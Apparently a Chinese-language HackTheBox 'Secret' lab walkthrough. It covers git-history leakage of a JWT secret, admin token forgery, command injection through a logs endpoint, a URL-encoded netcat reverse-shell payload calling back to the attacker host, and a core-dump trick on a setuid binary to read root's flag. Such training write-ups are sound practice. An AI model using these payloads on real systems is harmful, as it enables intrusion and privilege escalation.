![[HTB]HackTheBox-Easy-Secret国外渗透实战靶场,第1张](/aiimages/%5BHTB%5DHackTheBox-Easy-Secret%E5%9B%BD%E5%A4%96%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA.png "[HTB]HackTheBox-Easy-Secret国外渗透实战靶场,第1张")
🧟无风祭酒🧟
小医救人😈大医济世
☣️先礼后兵☢️
👻 警 👻
📰Majority Papers为笔者学习所整理的内容,本意希望借此知识输出方式达到筑牢基础的效用。如若有不足之处,还望大哥哥海涵。🧱向值得学习的人学习,向前辈们致敬!
🌑🌕暗黑模式,解锁加倍沉浸式阅读快乐🥤
Wechat 公众号:acesec
江湖追杀令🦾祭出Nmap
┌──(root💀kali)-[/home/kali]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.120
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-13 15:54 CST
Nmap scan report for 10.10.11.120
Host is up (0.30s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
| 256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_ 256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: DUMB Docs
3000/tcp open http Node.js (Express middleware)
|_http-title: DUMB Docs
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=3/13%OT=22%CT=1%CU=35012%PV=Y%DS=2%DC=T%G=Y%TM=622DA38
OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=C)SEQ
OS:(SP=106%GCD=1%ISR=100%TI=Z%CI=Z%TS=C)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O
OS:3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 310.78 ms 10.10.14.1
2 305.76 ms 10.10.11.120
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.71 seconds🪵 访问80端口
🪵 网页没发现什么,但是页面下方有源代码文件可下载。把它下载下来
#下载后解压
┌──(root💀kali)-[/home/kali/Desktop]
└─# unzip files.zip┌──(root💀kali)-[/home/kali/Desktop]
└─# ls -la 1 ⚙
-rw-r--r-- 1 kali kali 28849603 Mar 13 20:17 files.zip
drwxrwxr-x 8 root root 4096 Sep 3 2021 local-web┌──(root💀kali)-[/home/kali/Desktop/local-web]
└─# ls -la 1 ⚙
total 116
drwxrwxr-x 8 root root 4096 Sep 3 2021 .
drwxr-xr-x 6 kali kali 4096 Mar 13 20:31 ..
-rw-rw-r-- 1 root root 72 Sep 3 2021 .env
drwxrwxr-x 8 root root 4096 Sep 9 2021 .git
-rw-rw-r-- 1 root root 885 Sep 3 2021 index.js
drwxrwxr-x 2 root root 4096 Aug 13 2021 model
drwxrwxr-x 201 root root 4096 Aug 13 2021 node_modules
-rw-rw-r-- 1 root root 491 Aug 13 2021 package.json
-rw-rw-r-- 1 root root 69452 Aug 13 2021 package-lock.json
drwxrwxr-x 4 root root 4096 Sep 3 2021 public
drwxrwxr-x 2 root root 4096 Sep 3 2021 routes
drwxrwxr-x 4 root root 4096 Aug 13 2021 src
-rw-rw-r-- 1 root root 651 Aug 13 2021 validations.js🪵 应该是一个开源项目,然后还有git文件泄露。
🦾Git文件 邪路 泄漏利用
🪵 利用工具:https://github.com/LucifielHack/GitTools
🪵 工具下载后,利用下:
┌──(root💀kali)-[/home/kali/Desktop]
└─# /home/kali/Desktop/GitTools-master/Extractor/extractor.sh local-web/ dump 1 ⚙
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 4e5547295cfe456d8ca7005cb823e1101fd1f9cb
[+] Found file: /home/kali/Desktop/dump/0-4e5547295cfe456d8ca7005cb823e1101fd1f9cb/.env
.......
.......🪵 完成后,可以看到提取出六次数据
┌──(root💀kali)-[/home/kali/Desktop/dump]
└─# ls -la 1 ⚙
total 32
drwxr-xr-x 8 root root 4096 Mar 13 21:31 .
drwxr-xr-x 8 kali kali 4096 Mar 13 21:28 ..
drwxr-xr-x 7 root root 4096 Mar 13 21:29 0-4e5547295cfe456d8ca7005cb823e1101fd1f9cb
drwxr-xr-x 7 root root 4096 Mar 13 21:29 1-55fe756a29268f9b4e786ae468952ca4a8df1bd8
drwxr-xr-x 7 root root 4096 Mar 13 21:30 2-67d8da7a0e53d8fadeb6b36396d86cdcd4f6ec78
drwxr-xr-x 7 root root 4096 Mar 13 21:31 3-de0a46b5107a2f4d26e348303e76d85ae4870934
drwxr-xr-x 7 root root 4096 Mar 13 21:31 4-e297a2797a5f62b6011654cf6fb6ccb6712d2d5b
drwxr-xr-x 7 root root 4096 Mar 13 21:32 5-3a367e735ee76569664bf7754eaaade7c735d702🪵 依个查看这些数据:
┌──(root💀kali)-[/home/kali/Desktop/dump/0-4e5547295cfe456d8ca7005cb823e1101fd1f9cb]
└─# ls -la 1 ⚙
total 116
drwxr-xr-x 7 root root 4096 Mar 13 21:29 .
drwxr-xr-x 8 root root 4096 Mar 13 21:31 ..
-rw-r--r-- 1 root root 219 Mar 13 21:28 commit-meta.txt
-rw-r--r-- 1 root root 174 Mar 13 21:28 .env
-rw-r--r-- 1 root root 885 Mar 13 21:28 index.js
drwxr-xr-x 2 root root 4096 Mar 13 21:28 model
drwxr-xr-x 201 root root 4096 Mar 13 21:29 node_modules
-rw-r--r-- 1 root root 491 Mar 13 21:29 package.json
-rw-r--r-- 1 root root 69452 Mar 13 21:29 package-lock.json
drwxr-xr-x 3 root root 4096 Mar 13 21:29 public
drwxr-xr-x 2 root root 4096 Mar 13 21:29 routes
drwxr-xr-x 4 root root 4096 Mar 13 21:29 src
-rw-r--r-- 1 root root 651 Mar 13 21:29 validations.js🪵 可以确定是一个源码库,突破口在/routes/auth.js中
┌──(root💀kali)-[/home/…/Desktop/dump/0-4e5547295cfe456d8ca7005cb823e1101fd1f9cb/routes]
└─# cat auth.jsconst router = require('express').Router();
const User = require('../model/user');
const bcrypt = require('bcryptjs')
const jwt = require('jsonwebtoken')
const { registerValidation, loginValidation} = require('../validations')
router.post('/register', async (req, res) => {
// validation
const { error } = registerValidation(req.body)
if (error) return res.status(400).send(error.details[0].message);
// check if user exists
const emailExist = await User.findOne({email:req.body.email})
if (emailExist) return res.status(400).send('Email already Exist')
// check if user name exist
const unameexist = await User.findOne({ name: req.body.name })
if (unameexist) return res.status(400).send('Name already Exist')
//hash the password
const salt = await bcrypt.genSalt(10);
const hashPaswrod = await bcrypt.hash(req.body.password, salt)
//create a user
const user = new User({
name: req.body.name,
email: req.body.email,
password:hashPaswrod
});
try{
const saveduser = await user.save();
res.send({ user: user.name})
}
catch(err){
console.log(err)
}
});
// login
router.post('/login', async (req , res) => {
const { error } = loginValidation(req.body)
if (error) return res.status(400).send(error.details[0].message);
// check if email is okay
const user = await User.findOne({ email: req.body.email })
if (!user) return res.status(400).send('Email is wrong');
// check password
const validPass = await bcrypt.compare(req.body.password, user.password)
if (!validPass) return res.status(400).send('Password is wrong');
// create jwt
const token = jwt.sign({ _id: user.id, name: user.name , email: user.email}, process.env.TOKEN_SECRET )
res.header('auth-token', token).send(token);
})
router.use(function (req, res, next) {
res.json({
message: {
message: "404 page not found",
desc: "page you are looking for is not found. "
}
})
});
module.exports = router🪵 从上面auth.js 内的源码,可以看出来有/register来请求它
🪵 看到源代码后,不难理解其逻辑,程序的逻辑就是先要注册用户,并检查邮件和用户名是否存在,并将密码进行加密。然后程序跳转到登录页面,登录页面查看用户输入的邮件名和密码是否正确,并生成一个jwt的token值发送给用户。
🪵 首先添加一个DNS解析
┌──(root💀kali)-[/home/kali/Desktop]
└─# echo 10.10.11.120 secret.htb >> /etc/hosts🪵 跟着程序的逻辑走,先注册一个用户,使用curl命令进行注册
┌──(root💀kali)-[/home/kali]
└─# curl -X POST -H 'Content-Type: application/json' -v http://secret.htb/api/user/register --data '{"name": "acesec","email": "[email protected]","password": "123456"}'🪵 然后使用注册的用户进行登录
🪵 成功登录并获取到token
┌──(root💀kali)-[/home/kali]
└─# curl -X POST -H 'Content-Type: application/json' -v http://secret.htb/api/user/login --data '{"email": "[email protected]","password": "123456"}'
Note: Unnecessary use of -X or --request, POST is already inferred.
* Trying 10.10.11.120:80...
* Connected to secret.htb (10.10.11.120) port 80 (#0)
> POST /api/user/login HTTP/1.1
> Host: secret.htb
> User-Agent: curl/7.74.0
> Accept: */*
> Content-Type: application/json
> Content-Length: 51
>
* upload completely sent off: 51 out of 51 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Mon, 14 Mar 2022 07:05:10 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 208
< Connection: keep-alive
< X-Powered-By: Express
< auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjJlZTA2MmE3ZDY1NzA0NWUwZGZmODEiLCJuYW1lIjoiYWNlc2VjIiwiZW1haWwiOiJhY2VzZWNAYWNlc2VjLmNvbSIsImlhdCI6MTY0NzI0MTUxMH0.hpgz6dUqTjw8sy9a5oalmmqErV9oChs1gCqoz0WXTTY
< ETag: W/"d0-w7+RJUD8gBD3cmM8U8/MvQxVQV4"
<
* Connection #0 to host secret.htb left intact
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjJlZTA2MmE3ZDY1NzA0NWUwZGZmODEiLCJuYW1lIjoiYWNlc2VjIiwiZW1haWwiOiJhY2VzZWNAYWNlc2VjLmNvbSIsImlhdCI6MTY0NzI0MTUxMH0.hpgz6dUqTjw8sy9a5oalmmqErV9oChs1gCqoz0WXTTY🪵 查看并分析/routes/verifytoken.js文件的内容
const jwt = require("jsonwebtoken");
module.exports = function (req, res, next) {
const token = req.header("auth-token");
if (!token) return res.status(401).send("Access Denied");
try {
const verified = jwt.verify(token, process.env.TOKEN_SECRET);
req.user = verified;
next();
} catch (err) {
res.status(400).send("Invalid Token");
}
};🦾构造Payload
🪵 知道了JWT令牌的验证过程,那我们就构造一个payload查看一下我们当前的权限
┌──(root💀kali)-[/home/kali]
└─# curl http://secret.htb/api/priv -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjJlZTA2MmE3ZDY1NzA0NWUwZGZmODEiLCJuYW1lIjoiYWNlc2VjIiwiZW1haWwiOiJhY2VzZWNAYWNlc2VjLmNvbSIsImlhdCI6MTY0NzI0MTUxMH0.hpgz6dUqTjw8sy9a5oalmmqErV9oChs1gCqoz0WXTTY'
{"role":{"role":"you are normal user","desc":"acesec"}}得到回包,显示是一个普通用户权限
🪵 查看根目录的.env文件,得到了一段tokne
┌──(root💀kali)-[/home/kali/Desktop/dump/0-4e5547295cfe456d8ca7005cb823e1101fd1f9cb]
└─# cat .env 2 ⚙
DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE🪵 通过查看private.js得知验证逻辑是只要name = theadmin 就是admin账户
const router = require('express').Router();
const verifytoken = require('./verifytoken')
const User = require('../model/user');
router.get('/priv', verifytoken, (req, res) => {
// res.send(req.user)
const userinfo = { name: req.user }
const name = userinfo.name.name;
if (name == 'theadmin'){
res.json({
creds:{
role:"admin",
username:"theadmin",
desc : "welcome back admin,"
}
})
}
else{
res.json({
role: {
role: "you are normal user",
desc: userinfo.name.name
}
})
}
})
router.get('/logs', verifytoken, (req, res) => {
const file = req.query.file;
const userinfo = { name: req.user }
const name = userinfo.name.name;
if (name == 'theadmin'){
const getLogs = `git log --oneline ${file}`;
exec(getLogs, (err , output) =>{
if(err){
res.status(500).send(err);
return
}
res.json(output);
})
}
else{
res.json({
role: {
role: "you are normal user",
desc: userinfo.name.name
}
})
}
})
router.use(function (req, res, next) {
res.json({
message: {
message: "404 page not found",
desc: "page you are looking for is not found. "
}
})
});
module.exports = router🦾伪造JWT令牌
🪵 伪造一个JWT令牌
🪵 使用在线JWT修改工具或jwt_tools进行JWT令牌修改都可以
https://jwt.io/
https://link.zhihu.com/?target=https%3A//github.com/ticarpi/jwt_tool
🪵 在线工具
伪造一个admin的token
这里需要修改两个地方,把name处修改为theadmin,然后在下方框内填入我们在.env获取到的token值,即可生成一段新的JWT令牌
🪵 验证一下新的JWT令牌,发现已经是admin权限了
┌──(root💀kali)-[/home/kali]
└─# curl http://secret.htb/api/priv -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6InRoZWFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.5rUGTZpF99iTLdFPWnB_8XtiZvUlVKnfVGc_tdwHqkE'
{"creds":{"role":"admin","username":"theadmin","desc":"welcome back admin"}}🪵 通过分析private.js文件,我们发现必须将文件名指定为带有名称文件的get参数
┌──(root💀kali)-[/home/kali]
└─# curl 'http://secret.htb/api/logs?file=/etc/passwd' -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6InRoZWFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.5rUGTZpF99iTLdFPWnB_8XtiZvUlVKnfVGc_tdwHqkE'
{"killed":false,"code":128,"signal":null,"cmd":"git log --oneline /etc/passwd"}看着感觉像是命令注入?
🦾漏洞利用
┌──(root💀kali)-[/home/kali]
└─# curl 'http://secret.htb/api/logs?file=;id' -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6InRoZWFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.5rUGTZpF99iTLdFPWnB_8XtiZvUlVKnfVGc_tdwHqkE'
"80bf34c fixed typos 🎉\n0c75212 now we can view logs from server 😃\nab3e953 Added the codes\nuid=1000(dasith) gid=1000(dasith) groups=1000(dasith)\n"🪵 确认漏洞是存在的,那么我们现在先使用nc监听一个端口
nc -nvlp 4444🦾构造Payload
🪵 接着构造一个payload来进行利用
┌──(root💀kali)-[/home/kali]
└─# curl 'http://secret.htb/api/logs?file=;rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+10.10.14.3+4444+%3E%2Ftmp%2Ff%0A%0A' -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6InRoZWFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.5rUGTZpF99iTLdFPWnB_8XtiZvUlVKnfVGc_tdwHqkE'🦾GET Shell
🪵 成功获取到一个shell
┌──(root💀kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.120] 36752
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty.spawn('/bin/bash')";
dasith@secret:~/local-web$ whoami
whoami
dasith
dasith@secret:~/local-web$ id
id
uid=1000(dasith) gid=1000(dasith) groups=1000(dasith)
dasith@secret:~/local-web$🪵 获取一个较完整的交互式shell:
python3 -c "import pty;pty.spawn('/bin/bash')";🦾诺曼底登陆: user权限flag
🪵 成功获取到user权限的flag文件:
dasith@secret:~/local-web$ cd ..
cd ..
dasith@secret:~$ ls -la
ls -la
total 68
drwxr-xr-x 8 dasith dasith 4096 Oct 7 13:12 .
drwxr-xr-x 3 root root 4096 Sep 3 2021 ..
lrwxrwxrwx 1 dasith dasith 9 Sep 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 dasith dasith 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 dasith dasith 3771 Feb 25 2020 .bashrc
drwx------ 2 dasith dasith 4096 Aug 13 2021 .cache
drwx------ 3 dasith dasith 4096 Aug 13 2021 .config
lrwxrwxrwx 1 dasith dasith 9 Sep 3 2021 .dbshell -> /dev/null
-rw-rw-r-- 1 dasith dasith 48 Sep 3 2021 .gitconfig
drwxrwxr-x 3 dasith dasith 4096 Sep 3 2021 .local
drwxrwxr-x 8 dasith dasith 4096 Sep 8 2021 local-web
-rw------- 1 dasith dasith 0 Aug 13 2021 .mongorc.js
drwxrwxr-x 5 dasith dasith 4096 Sep 3 2021 .npm
drwxrwxr-x 5 dasith dasith 4096 Mar 14 06:27 .pm2
-rw-r--r-- 1 dasith dasith 807 Feb 25 2020 .profile
-rw-rw-r-- 1 dasith dasith 66 Sep 8 2021 .selected_editor
-r-------- 1 dasith dasith 33 Mar 14 06:27 user.txt
-rw------- 1 dasith dasith 10942 Sep 8 2021 .viminfo
dasith@secret:~$ cat user.txt
cat user.txt
f5f687a20e74c35bb8cefa2edfc4a87a🦾root权限提升
🪵 查看一下当前的可执行文件
dasith@secret:~$ find / -type f -perm -u=s 2>/dev/null
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/opt/count
/snap/snapd/13640/usr/lib/snapd/snap-confine
/snap/snapd/13170/usr/lib/snapd/snap-confine
/snap/core20/1169/usr/bin/chfn
/snap/core20/1169/usr/bin/chsh
/snap/core20/1169/usr/bin/gpasswd
/snap/core20/1169/usr/bin/mount
/snap/core20/1169/usr/bin/newgrp
/snap/core20/1169/usr/bin/passwd
/snap/core20/1169/usr/bin/su
/snap/core20/1169/usr/bin/sudo
/snap/core20/1169/usr/bin/umount
/snap/core20/1169/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1169/usr/lib/openssh/ssh-keysign
/snap/core18/2128/bin/mount
/snap/core18/2128/bin/ping
/snap/core18/2128/bin/su
/snap/core18/2128/bin/umount
/snap/core18/2128/usr/bin/chfn
/snap/core18/2128/usr/bin/chsh
/snap/core18/2128/usr/bin/gpasswd
/snap/core18/2128/usr/bin/newgrp
/snap/core18/2128/usr/bin/passwd
/snap/core18/2128/usr/bin/sudo
/snap/core18/2128/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2128/usr/lib/openssh/ssh-keysign
/snap/core18/1944/bin/mount
/snap/core18/1944/bin/ping
/snap/core18/1944/bin/su
/snap/core18/1944/bin/umount
/snap/core18/1944/usr/bin/chfn
/snap/core18/1944/usr/bin/chsh
/snap/core18/1944/usr/bin/gpasswd
/snap/core18/1944/usr/bin/newgrp
/snap/core18/1944/usr/bin/passwd
/snap/core18/1944/usr/bin/sudo
/snap/core18/1944/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1944/usr/lib/openssh/ssh-keysign🪵 获取到了一些可执行的二进制文件
🪵 把目光着眼放在/opt/count上
dasith@secret:/opt$ cat code.c#include
#include
#include
#include
#include
#include
#include
#include
#include
void dircount(const char *path, char *summary)
{
DIR *dir;
char fullpath[PATH_MAX];
struct dirent *ent;
struct stat fstat;
int tot = 0, regular_files = 0, directories = 0, symlinks = 0;
if((dir = opendir(path)) == NULL)
{
printf("\nUnable to open directory.\n");
exit(EXIT_FAILURE);
}
while ((ent = readdir(dir)) != NULL)
{
++tot;
strncpy(fullpath, path, PATH_MAX-NAME_MAX-1);
strcat(fullpath, "/");
strncat(fullpath, ent->d_name, strlen(ent->d_name));
if (!lstat(fullpath, &fstat))
{
if(S_ISDIR(fstat.st_mode))
{
printf("d");
++directories;
}
else if(S_ISLNK(fstat.st_mode))
{
printf("l");
++symlinks;
}
else if(S_ISREG(fstat.st_mode))
{
printf("-");
++regular_files;
}
else printf("?");
printf((fstat.st_mode & S_IRUSR) ? "r" : "-");
printf((fstat.st_mode & S_IWUSR) ? "w" : "-");
printf((fstat.st_mode & S_IXUSR) ? "x" : "-");
printf((fstat.st_mode & S_IRGRP) ? "r" : "-");
printf((fstat.st_mode & S_IWGRP) ? "w" : "-");
printf((fstat.st_mode & S_IXGRP) ? "x" : "-");
printf((fstat.st_mode & S_IROTH) ? "r" : "-");
printf((fstat.st_mode & S_IWOTH) ? "w" : "-");
printf((fstat.st_mode & S_IXOTH) ? "x" : "-");
}
else
{
printf("??????????");
}
printf ("\t%s\n", ent->d_name);
}
closedir(dir);
snprintf(summary, 4096, "Total entries = %d\nRegular files = %d\nDirectories = %d\nSymbolic links = %d\n", tot, regular_files, directories, symlinks);
printf("\n%s", summary);
}
void filecount(const char *path, char *summary)
{
FILE *file;
char ch;
int characters, words, lines;
file = fopen(path, "r");
if (file == NULL)
{
printf("\nUnable to open file.\n");
printf("Please check if file exists and you have read privilege.\n");
exit(EXIT_FAILURE);
}
characters = words = lines = 0;
while ((ch = fgetc(file)) != EOF)
{
characters++;
if (ch == '\n' || ch == '\0')
lines++;
if (ch == ' ' || ch == '\t' || ch == '\n' || ch == '\0')
words++;
}
if (characters > 0)
{
words++;
lines++;
}
snprintf(summary, 256, "Total characters = %d\nTotal words = %d\nTotal lines = %d\n", characters, words, lines);
printf("\n%s", summary);
}
int main()
{
char path[100];
int res;
struct stat path_s;
char summary[4096];
printf("Enter source file/directory name: ");
scanf("%99s", path);
getchar();
stat(path, &path_s);
if(S_ISDIR(path_s.st_mode))
dircount(path, summary);
else
filecount(path, summary);
// drop privs to limit file write
setuid(getuid());
// Enable coredump generation
prctl(PR_SET_DUMPABLE, 1);
printf("Save results a file? [y/N]: ");
res = getchar();
if (res == 121 || res == 89) {
printf("Path: ");
scanf("%99s", path);
FILE *fp = fopen(path, "a");
if (fp != NULL) {
fputs(summary, fp);
fclose(fp);
} else {
printf("Could not open %s for writing\n", path);
}
}
return 0;
} 🪵 这是count的源码,通过分析后得知,这里大多数情况下,如果我们在执行代码中崩溃了,报告通常会保存在/var/crash中
在通常情况下,这是不可能的,但是通过这个pem设置prctl(PR_SET_DUMPABLE, 1);,它可以被实现
由于它设置为1,我们可以产生核心转储,利用的话需要两个条件
-
首先需要确保有两个shell
-
可以导致崩溃
具体参考资料https://man7.org/linux/man-pages/man2/prctl.2.html
🪵 Shell 1
dasith@secret:/opt$ ./count
./count
Enter source file/directory name: /root/root.txt
/root/root.txt
Total characters = 33
Total words = 2
Total lines = 2
Save results a file? [y/N]: y
y
Path:🪵 执行后去shell 2让进程崩溃
🪵 shell 2
dasith@secret:/opt$ ps -aux | grep count
ps -aux | grep count
root 830 0.0 0.1 235672 7488 ? Ssl 06:26 0:00 /usr/lib/accountsservice/accounts-daemon
dasith 1489 0.0 0.0 2488 592 pts/0 S+ 08:23 0:00 ./count
dasith 1517 0.0 0.0 6432 740 pts/1 S+ 08:33 0:00 grep --color=auto count
dasith@secret:/opt$ kill -BUS 1489
kill -BUS 1489🪵 执行完,再回去看shell 1发现Path处多了一句话Path: Bus error (core dumped),可见进程已经崩溃
🪵 shell 1
dasith@secret:/opt$ ./count
./count
Enter source file/directory name: /root/root.txt
/root/root.txt
Total characters = 33
Total words = 2
Total lines = 2
Save results a file? [y/N]: y
y
Path: Bus error (core dumped)🪵 可以看到已经生成了错误日志
dasith@secret:/opt$ cd /var/crash
cd /var/crash
dasith@secret:/var/crash$ ls -la
ls -la
total 88
drwxrwxrwt 2 root root 4096 Mar 14 08:34 .
drwxr-xr-x 14 root root 4096 Aug 13 2021 ..
-rw-r----- 1 dasith dasith 28040 Mar 14 08:34 _opt_count.1000.crash🪵 新建一个自己的目录,然后把文件拷贝过去
🪵 通过使用 apport-unpack 我们可以轻松调试程序的崩溃。
dasith@secret:/var/crash$ mkdir /tmp/acesec
dasith@secret:/var/crash$ apport-unpack _opt_count.1000.crash /tmp/acesec
dasith@secret:/var/crash$ cd /tmp/acesec
dasith@secret:/tmp/acesec$ ls -la
total 436
drwxr-xr-x 2 dasith dasith 4096 Mar 14 08:46 .
drwxrwxrwt 13 root root 4096 Mar 14 08:45 ..
-rw-r--r-- 1 dasith dasith 5 Mar 14 08:46 Architecture
-rw-r--r-- 1 dasith dasith 380928 Mar 14 08:46 CoreDump
-rw-r--r-- 1 dasith dasith 24 Mar 14 08:46 Date
-rw-r--r-- 1 dasith dasith 12 Mar 14 08:46 DistroRelease
-rw-r--r-- 1 dasith dasith 10 Mar 14 08:46 ExecutablePath
-rw-r--r-- 1 dasith dasith 10 Mar 14 08:46 ExecutableTimestamp
-rw-r--r-- 1 dasith dasith 5 Mar 14 08:46 ProblemType
-rw-r--r-- 1 dasith dasith 7 Mar 14 08:46 ProcCmdline
-rw-r--r-- 1 dasith dasith 4 Mar 14 08:46 ProcCwd
-rw-r--r-- 1 dasith dasith 53 Mar 14 08:46 ProcEnviron
-rw-r--r-- 1 dasith dasith 2144 Mar 14 08:46 ProcMaps
-rw-r--r-- 1 dasith dasith 1336 Mar 14 08:46 ProcStatus
-rw-r--r-- 1 dasith dasith 1 Mar 14 08:46 Signal
-rw-r--r-- 1 dasith dasith 29 Mar 14 08:46 Uname
-rw-r--r-- 1 dasith dasith 3 Mar 14 08:46 UserGroups🪵 可以看到有一个CoreDump文件,我们将其以字符串形式输出
dasith@secret:/tmp/acesec$ strings CoreDump
strings CoreDump
CORE
CORE
count
./count
IGISCORE
CORE
ELIFCORE
/opt/count
/opt/count
/opt/count
/opt/count
/opt/count
/usr/lib/x86_64-linux-gnu/libc-2.31.so
/usr/lib/x86_64-linux-gnu/libc-2.31.so
/usr/lib/x86_64-linux-gnu/libc-2.31.so
/usr/lib/x86_64-linux-gnu/libc-2.31.so
/usr/lib/x86_64-linux-gnu/libc-2.31.so
/usr/lib/x86_64-linux-gnu/libc-2.31.so
/usr/lib/x86_64-linux-gnu/ld-2.31.so
/usr/lib/x86_64-linux-gnu/ld-2.31.so
/usr/lib/x86_64-linux-gnu/ld-2.31.so
/usr/lib/x86_64-linux-gnu/ld-2.31.so
/usr/lib/x86_64-linux-gnu/ld-2.31.so
CORE
Path:
Could
LINUX
Path:
Could
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
exit
readdir
fopen
closedir
__isoc99_scanf
strncpy
__stack_chk_fail
putchar
fgetc
strlen
prctl
getchar
fputs
fclose
opendir
getuid
strncat
__cxa_finalize
__libc_start_main
snprintf
__xstat
__lxstat
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
Unable to open directory.
??????????
Total entries = %d
Regular files = %d
Directories = %d
Symbolic links = %d
Unable to open file.
Please check if file exists and you have read privilege.
Total characters = %d
Total words = %d
Total lines = %d
Enter source file/directory name:
%99s
Save results a file? [y/N]:
Path:
Could not open %s for writing
:*3$"
Path: esults a file? [y/N]: words = 2
Total lines = 2
oot/root.txt
5fa8441d1d205afd5bcc44d56c96c8b4
aliases
ethersX
group
gshadow
hosts
initgroups
netgroup
networks
passwd
protocols
publickey
services
shadow
CAk[S
libc.so.6
/lib/x86_64-linux-gnu
libc.so.6
uTi7J
|F:m
_rtld_global
__get_cpu_features
_dl_find_dso_for_object
_dl_make_stack_executable
_dl_exception_create
__libc_stack_end
_dl_catch_exception
malloc
_dl_deallocate_tls
_dl_signal_exception
__tunable_get_val
__libc_enable_secure
__tls_get_addr
_dl_get_tls_static_info
calloc
_dl_exception_free
_dl_debug_state
_dl_argv
_dl_allocate_tls_init
_rtld_global_ro
realloc
_dl_rtld_di_serinfo
_dl_mcount
_dl_allocate_tls
_dl_signal_error
_dl_exception_create_format
_r_debug
_dl_catch_error
ld-linux-x86-64.so.2
GLIBC_2.2.5
GLIBC_2.3
GLIBC_2.4
